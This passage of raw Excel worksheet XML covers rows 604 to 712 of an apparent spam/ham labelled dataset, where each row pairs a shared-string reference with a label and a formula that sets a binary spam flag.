      <c r="C604" s="1">
        <f>IF(B604="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="605" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A605" t="s">
        <v>5890</v>
      </c>
      <c r="B605" t="s">
        <v>5294</v>
      </c>
      <c r="C605" s="1">
        <f>IF(B605="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="606" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A606" t="s">
        <v>5891</v>
      </c>
      <c r="B606" t="s">
        <v>5294</v>
      </c>
      <c r="C606" s="1">
        <f>IF(B606="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="607" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A607" t="s">
        <v>5892</v>
      </c>
      <c r="B607" t="s">
        <v>5294</v>
      </c>
      <c r="C607" s="1">
        <f>IF(B607="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="608" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A608" t="s">
        <v>5893</v>
      </c>
      <c r="B608" t="s">
        <v>5297</v>
      </c>
      <c r="C608" s="1">
        <f>IF(B608="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="609" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A609" t="s">
        <v>5894</v>
      </c>
      <c r="B609" t="s">
        <v>5294</v>
      </c>
      <c r="C609" s="1">
        <f>IF(B609="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="610" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A610" t="s">
        <v>5895</v>
      </c>
      <c r="B610" t="s">
        <v>5294</v>
      </c>
      <c r="C610" s="1">
        <f>IF(B610="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="611" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A611" t="s">
        <v>5896</v>
      </c>
      <c r="B611" t="s">
        <v>5294</v>
      </c>
      <c r="C611" s="1">
        <f>IF(B611="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="612" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A612" t="s">
        <v>5897</v>
      </c>
      <c r="B612" t="s">
        <v>5297</v>
      </c>
      <c r="C612" s="1">
        <f>IF(B612="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="613" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A613" t="s">
        <v>5898</v>
      </c>
      <c r="B613" t="s">
        <v>5294</v>
      </c>
      <c r="C613" s="1">
        <f>IF(B613="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="614" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A614" t="s">
        <v>5899</v>
      </c>
      <c r="B614" t="s">
        <v>5294</v>
      </c>
      <c r="C614" s="1">
        <f>IF(B614="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="615" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A615" t="s">
        <v>5900</v>
      </c>
      <c r="B615" t="s">
        <v>5294</v>
      </c>
      <c r="C615" s="1">
        <f>IF(B615="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="616" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A616" t="s">
        <v>5901</v>
      </c>
      <c r="B616" t="s">
        <v>5294</v>
      </c>
      <c r="C616" s="1">
        <f>IF(B616="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="617" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A617" t="s">
        <v>5902</v>
      </c>
      <c r="B617" t="s">
        <v>5294</v>
      </c>
      <c r="C617" s="1">
        <f>IF(B617="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="618" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A618" t="s">
        <v>5903</v>
      </c>
      <c r="B618" t="s">
        <v>5294</v>
      </c>
      <c r="C618" s="1">
        <f>IF(B618="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="619" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A619" t="s">
        <v>5904</v>
      </c>
      <c r="B619" t="s">
        <v>5294</v>
      </c>
      <c r="C619" s="1">
        <f>IF(B619="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="620" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A620" t="s">
        <v>5905</v>
      </c>
      <c r="B620" t="s">
        <v>5294</v>
      </c>
      <c r="C620" s="1">
        <f>IF(B620="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="621" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A621" t="s">
        <v>5906</v>
      </c>
      <c r="B621" t="s">
        <v>5294</v>
      </c>
      <c r="C621" s="1">
        <f>IF(B621="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="622" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A622" t="s">
        <v>5907</v>
      </c>
      <c r="B622" t="s">
        <v>5294</v>
      </c>
      <c r="C622" s="1">
        <f>IF(B622="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="623" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A623" t="s">
        <v>5908</v>
      </c>
      <c r="B623" t="s">
        <v>5294</v>
      </c>
      <c r="C623" s="1">
        <f>IF(B623="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="624" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A624" t="s">
        <v>5909</v>
      </c>
      <c r="B624" t="s">
        <v>5294</v>
      </c>
      <c r="C624" s="1">
        <f>IF(B624="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="625" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A625" t="s">
        <v>5910</v>
      </c>
      <c r="B625" t="s">
        <v>5294</v>
      </c>
      <c r="C625" s="1">
        <f>IF(B625="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="626" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A626" t="s">
        <v>5911</v>
      </c>
      <c r="B626" t="s">
        <v>5294</v>
      </c>
      <c r="C626" s="1">
        <f>IF(B626="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="627" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A627" t="s">
        <v>5912</v>
      </c>
      <c r="B627" t="s">
        <v>5294</v>
      </c>
      <c r="C627" s="1">
        <f>IF(B627="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="628" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A628" t="s">
        <v>5913</v>
      </c>
      <c r="B628" t="s">
        <v>5294</v>
      </c>
      <c r="C628" s="1">
        <f>IF(B628="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="629" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A629" t="s">
        <v>5914</v>
      </c>
      <c r="B629" t="s">
        <v>5294</v>
      </c>
      <c r="C629" s="1">
        <f>IF(B629="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="630" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A630" t="s">
        <v>5915</v>
      </c>
      <c r="B630" t="s">
        <v>5297</v>
      </c>
      <c r="C630" s="1">
        <f>IF(B630="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="631" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A631" t="s">
        <v>5916</v>
      </c>
      <c r="B631" t="s">
        <v>5297</v>
      </c>
      <c r="C631" s="1">
        <f>IF(B631="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="632" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A632" t="s">
        <v>5917</v>
      </c>
      <c r="B632" t="s">
        <v>5294</v>
      </c>
      <c r="C632" s="1">
        <f>IF(B632="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="633" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A633" t="s">
        <v>5918</v>
      </c>
      <c r="B633" t="s">
        <v>5294</v>
      </c>
      <c r="C633" s="1">
        <f>IF(B633="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="634" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A634" t="s">
        <v>5919</v>
      </c>
      <c r="B634" t="s">
        <v>5294</v>
      </c>
      <c r="C634" s="1">
        <f>IF(B634="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="635" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A635" t="s">
        <v>5920</v>
      </c>
      <c r="B635" t="s">
        <v>5294</v>
      </c>
      <c r="C635" s="1">
        <f>IF(B635="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="636" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A636" t="s">
        <v>5921</v>
      </c>
      <c r="B636" t="s">
        <v>5297</v>
      </c>
      <c r="C636" s="1">
        <f>IF(B636="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="637" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A637" t="s">
        <v>5922</v>
      </c>
      <c r="B637" t="s">
        <v>5294</v>
      </c>
      <c r="C637" s="1">
        <f>IF(B637="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="638" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A638" t="s">
        <v>5923</v>
      </c>
      <c r="B638" t="s">
        <v>5294</v>
      </c>
      <c r="C638" s="1">
        <f>IF(B638="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="639" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A639" t="s">
        <v>5924</v>
      </c>
      <c r="B639" t="s">
        <v>5294</v>
      </c>
      <c r="C639" s="1">
        <f>IF(B639="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="640" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A640" t="s">
        <v>5925</v>
      </c>
      <c r="B640" t="s">
        <v>5294</v>
      </c>
      <c r="C640" s="1">
        <f>IF(B640="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="641" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A641" t="s">
        <v>5926</v>
      </c>
      <c r="B641" t="s">
        <v>5294</v>
      </c>
      <c r="C641" s="1">
        <f>IF(B641="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="642" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A642" t="s">
        <v>5927</v>
      </c>
      <c r="B642" t="s">
        <v>5294</v>
      </c>
      <c r="C642" s="1">
        <f>IF(B642="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="643" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A643" t="s">
        <v>5928</v>
      </c>
      <c r="B643" t="s">
        <v>5294</v>
      </c>
      <c r="C643" s="1">
        <f>IF(B643="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="644" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A644" t="s">
        <v>5929</v>
      </c>
      <c r="B644" t="s">
        <v>5294</v>
      </c>
      <c r="C644" s="1">
        <f>IF(B644="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="645" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A645" t="s">
        <v>5930</v>
      </c>
      <c r="B645" t="s">
        <v>5294</v>
      </c>
      <c r="C645" s="1">
        <f>IF(B645="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="646" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A646" t="s">
        <v>5931</v>
      </c>
      <c r="B646" t="s">
        <v>5294</v>
      </c>
      <c r="C646" s="1">
        <f>IF(B646="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="647" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A647" t="s">
        <v>5932</v>
      </c>
      <c r="B647" t="s">
        <v>5294</v>
      </c>
      <c r="C647" s="1">
        <f>IF(B647="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="648" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A648" t="s">
        <v>5933</v>
      </c>
      <c r="B648" t="s">
        <v>5294</v>
      </c>
      <c r="C648" s="1">
        <f>IF(B648="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="649" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A649" t="s">
        <v>5934</v>
      </c>
      <c r="B649" t="s">
        <v>5297</v>
      </c>
      <c r="C649" s="1">
        <f>IF(B649="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="650" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A650" t="s">
        <v>5935</v>
      </c>
      <c r="B650" t="s">
        <v>5294</v>
      </c>
      <c r="C650" s="1">
        <f>IF(B650="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="651" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A651" t="s">
        <v>5936</v>
      </c>
      <c r="B651" t="s">
        <v>5297</v>
      </c>
      <c r="C651" s="1">
        <f>IF(B651="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="652" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A652" t="s">
        <v>5937</v>
      </c>
      <c r="B652" t="s">
        <v>5294</v>
      </c>
      <c r="C652" s="1">
        <f>IF(B652="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="653" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A653" t="s">
        <v>5938</v>
      </c>
      <c r="B653" t="s">
        <v>5294</v>
      </c>
      <c r="C653" s="1">
        <f>IF(B653="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="654" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A654" t="s">
        <v>5939</v>
      </c>
      <c r="B654" t="s">
        <v>5294</v>
      </c>
      <c r="C654" s="1">
        <f>IF(B654="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="655" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A655" t="s">
        <v>5940</v>
      </c>
      <c r="B655" t="s">
        <v>5294</v>
      </c>
      <c r="C655" s="1">
        <f>IF(B655="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="656" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A656" t="s">
        <v>5490</v>
      </c>
      <c r="B656" t="s">
        <v>5294</v>
      </c>
      <c r="C656" s="1">
        <f>IF(B656="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="657" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A657" t="s">
        <v>5941</v>
      </c>
      <c r="B657" t="s">
        <v>5294</v>
      </c>
      <c r="C657" s="1">
        <f>IF(B657="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="658" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A658" t="s">
        <v>5942</v>
      </c>
      <c r="B658" t="s">
        <v>5294</v>
      </c>
      <c r="C658" s="1">
        <f>IF(B658="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="659" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A659" t="s">
        <v>5379</v>
      </c>
      <c r="B659" t="s">
        <v>5294</v>
      </c>
      <c r="C659" s="1">
        <f>IF(B659="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="660" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A660" t="s">
        <v>5943</v>
      </c>
      <c r="B660" t="s">
        <v>5294</v>
      </c>
      <c r="C660" s="1">
        <f>IF(B660="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="661" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A661" t="s">
        <v>5944</v>
      </c>
      <c r="B661" t="s">
        <v>5297</v>
      </c>
      <c r="C661" s="1">
        <f>IF(B661="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="662" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A662" t="s">
        <v>5945</v>
      </c>
      <c r="B662" t="s">
        <v>5294</v>
      </c>
      <c r="C662" s="1">
        <f>IF(B662="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="663" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A663" t="s">
        <v>5946</v>
      </c>
      <c r="B663" t="s">
        <v>5294</v>
      </c>
      <c r="C663" s="1">
        <f>IF(B663="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="664" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A664" t="s">
        <v>5947</v>
      </c>
      <c r="B664" t="s">
        <v>5294</v>
      </c>
      <c r="C664" s="1">
        <f>IF(B664="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="665" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A665" t="s">
        <v>5948</v>
      </c>
      <c r="B665" t="s">
        <v>5294</v>
      </c>
      <c r="C665" s="1">
        <f>IF(B665="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="666" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A666" t="s">
        <v>5949</v>
      </c>
      <c r="B666" t="s">
        <v>5294</v>
      </c>
      <c r="C666" s="1">
        <f>IF(B666="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="667" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A667" t="s">
        <v>5950</v>
      </c>
      <c r="B667" t="s">
        <v>5294</v>
      </c>
      <c r="C667" s="1">
        <f>IF(B667="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="668" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A668" t="s">
        <v>5951</v>
      </c>
      <c r="B668" t="s">
        <v>5294</v>
      </c>
      <c r="C668" s="1">
        <f>IF(B668="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="669" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A669" t="s">
        <v>5952</v>
      </c>
      <c r="B669" t="s">
        <v>5294</v>
      </c>
      <c r="C669" s="1">
        <f>IF(B669="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="670" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A670" t="s">
        <v>5953</v>
      </c>
      <c r="B670" t="s">
        <v>5294</v>
      </c>
      <c r="C670" s="1">
        <f>IF(B670="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="671" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A671" t="s">
        <v>5954</v>
      </c>
      <c r="B671" t="s">
        <v>5294</v>
      </c>
      <c r="C671" s="1">
        <f>IF(B671="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="672" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A672" t="s">
        <v>5955</v>
      </c>
      <c r="B672" t="s">
        <v>5294</v>
      </c>
      <c r="C672" s="1">
        <f>IF(B672="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="673" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A673" t="s">
        <v>5956</v>
      </c>
      <c r="B673" t="s">
        <v>5297</v>
      </c>
      <c r="C673" s="1">
        <f>IF(B673="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="674" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A674" t="s">
        <v>5957</v>
      </c>
      <c r="B674" t="s">
        <v>5297</v>
      </c>
      <c r="C674" s="1">
        <f>IF(B674="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="675" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A675" t="s">
        <v>5958</v>
      </c>
      <c r="B675" t="s">
        <v>5294</v>
      </c>
      <c r="C675" s="1">
        <f>IF(B675="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="676" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A676" t="s">
        <v>5959</v>
      </c>
      <c r="B676" t="s">
        <v>5294</v>
      </c>
      <c r="C676" s="1">
        <f>IF(B676="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="677" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A677" t="s">
        <v>5960</v>
      </c>
      <c r="B677" t="s">
        <v>5294</v>
      </c>
      <c r="C677" s="1">
        <f>IF(B677="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="678" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A678" t="s">
        <v>5961</v>
      </c>
      <c r="B678" t="s">
        <v>5294</v>
      </c>
      <c r="C678" s="1">
        <f>IF(B678="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="679" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A679" t="s">
        <v>5962</v>
      </c>
      <c r="B679" t="s">
        <v>5294</v>
      </c>
      <c r="C679" s="1">
        <f>IF(B679="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="680" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A680" t="s">
        <v>5963</v>
      </c>
      <c r="B680" t="s">
        <v>5294</v>
      </c>
      <c r="C680" s="1">
        <f>IF(B680="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="681" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A681" t="s">
        <v>5964</v>
      </c>
      <c r="B681" t="s">
        <v>5294</v>
      </c>
      <c r="C681" s="1">
        <f>IF(B681="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="682" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A682" t="s">
        <v>5965</v>
      </c>
      <c r="B682" t="s">
        <v>5294</v>
      </c>
      <c r="C682" s="1">
        <f>IF(B682="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="683" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A683" t="s">
        <v>5966</v>
      </c>
      <c r="B683" t="s">
        <v>5294</v>
      </c>
      <c r="C683" s="1">
        <f>IF(B683="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="684" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A684" t="s">
        <v>5967</v>
      </c>
      <c r="B684" t="s">
        <v>5294</v>
      </c>
      <c r="C684" s="1">
        <f>IF(B684="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="685" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A685" t="s">
        <v>5968</v>
      </c>
      <c r="B685" t="s">
        <v>5297</v>
      </c>
      <c r="C685" s="1">
        <f>IF(B685="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="686" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A686" t="s">
        <v>5969</v>
      </c>
      <c r="B686" t="s">
        <v>5294</v>
      </c>
      <c r="C686" s="1">
        <f>IF(B686="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="687" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A687" t="s">
        <v>5970</v>
      </c>
      <c r="B687" t="s">
        <v>5294</v>
      </c>
      <c r="C687" s="1">
        <f>IF(B687="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="688" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A688" t="s">
        <v>5971</v>
      </c>
      <c r="B688" t="s">
        <v>5294</v>
      </c>
      <c r="C688" s="1">
        <f>IF(B688="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="689" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A689" t="s">
        <v>5972</v>
      </c>
      <c r="B689" t="s">
        <v>5294</v>
      </c>
      <c r="C689" s="1">
        <f>IF(B689="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="690" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A690" t="s">
        <v>5973</v>
      </c>
      <c r="B690" t="s">
        <v>5294</v>
      </c>
      <c r="C690" s="1">
        <f>IF(B690="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="691" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A691" t="s">
        <v>5974</v>
      </c>
      <c r="B691" t="s">
        <v>5297</v>
      </c>
      <c r="C691" s="1">
        <f>IF(B691="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="692" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A692" t="s">
        <v>5975</v>
      </c>
      <c r="B692" t="s">
        <v>5294</v>
      </c>
      <c r="C692" s="1">
        <f>IF(B692="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="693" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A693" t="s">
        <v>5976</v>
      </c>
      <c r="B693" t="s">
        <v>5294</v>
      </c>
      <c r="C693" s="1">
        <f>IF(B693="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="694" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A694" t="s">
        <v>5977</v>
      </c>
      <c r="B694" t="s">
        <v>5294</v>
      </c>
      <c r="C694" s="1">
        <f>IF(B694="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="695" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A695" t="s">
        <v>5978</v>
      </c>
      <c r="B695" t="s">
        <v>5294</v>
      </c>
      <c r="C695" s="1">
        <f>IF(B695="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="696" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A696" t="s">
        <v>5979</v>
      </c>
      <c r="B696" t="s">
        <v>5294</v>
      </c>
      <c r="C696" s="1">
        <f>IF(B696="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="697" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A697" t="s">
        <v>5980</v>
      </c>
      <c r="B697" t="s">
        <v>5294</v>
      </c>
      <c r="C697" s="1">
        <f>IF(B697="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="698" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A698" t="s">
        <v>5981</v>
      </c>
      <c r="B698" t="s">
        <v>5294</v>
      </c>
      <c r="C698" s="1">
        <f>IF(B698="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="699" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A699" t="s">
        <v>5982</v>
      </c>
      <c r="B699" t="s">
        <v>5294</v>
      </c>
      <c r="C699" s="1">
        <f>IF(B699="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="700" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A700" t="s">
        <v>5983</v>
      </c>
      <c r="B700" t="s">
        <v>5294</v>
      </c>
      <c r="C700" s="1">
        <f>IF(B700="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="701" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A701" t="s">
        <v>5984</v>
      </c>
      <c r="B701" t="s">
        <v>5294</v>
      </c>
      <c r="C701" s="1">
        <f>IF(B701="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="702" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A702" t="s">
        <v>5985</v>
      </c>
      <c r="B702" t="s">
        <v>5294</v>
      </c>
      <c r="C702" s="1">
        <f>IF(B702="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="703" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A703" t="s">
        <v>5376</v>
      </c>
      <c r="B703" t="s">
        <v>5294</v>
      </c>
      <c r="C703" s="1">
        <f>IF(B703="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="704" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A704" t="s">
        <v>5986</v>
      </c>
      <c r="B704" t="s">
        <v>5294</v>
      </c>
      <c r="C704" s="1">
        <f>IF(B704="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="705" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A705" t="s">
        <v>5987</v>
      </c>
      <c r="B705" t="s">
        <v>5294</v>
      </c>
      <c r="C705" s="1">
        <f>IF(B705="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="706" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A706" t="s">
        <v>5988</v>
      </c>
      <c r="B706" t="s">
        <v>5294</v>
      </c>
      <c r="C706" s="1">
        <f>IF(B706="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="707" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A707" t="s">
        <v>5989</v>
      </c>
      <c r="B707" t="s">
        <v>5294</v>
      </c>
      <c r="C707" s="1">
        <f>IF(B707="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="708" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A708" t="s">
        <v>5990</v>
      </c>
      <c r="B708" t="s">
        <v>5294</v>
      </c>
      <c r="C708" s="1">
        <f>IF(B708="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="709" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A709" t="s">
        <v>5991</v>
      </c>
      <c r="B709" t="s">
        <v>5294</v>
      </c>
      <c r="C709" s="1">
        <f>IF(B709="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="710" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A710" t="s">
        <v>5992</v>
      </c>
      <c r="B710" t="s">
        <v>5297</v>
      </c>
      <c r="C710" s="1">
        <f>IF(B710="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="711" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A711" t="s">
        <v>5993</v>
      </c>
      <c r="B711" t="s">
        <v>5297</v>
      </c>
      <c r="C711" s="1">
        <f>IF(B711="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="712" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A712" t="s">
        <v>5994</v>
      </c>
      <c r="B712" t="s">
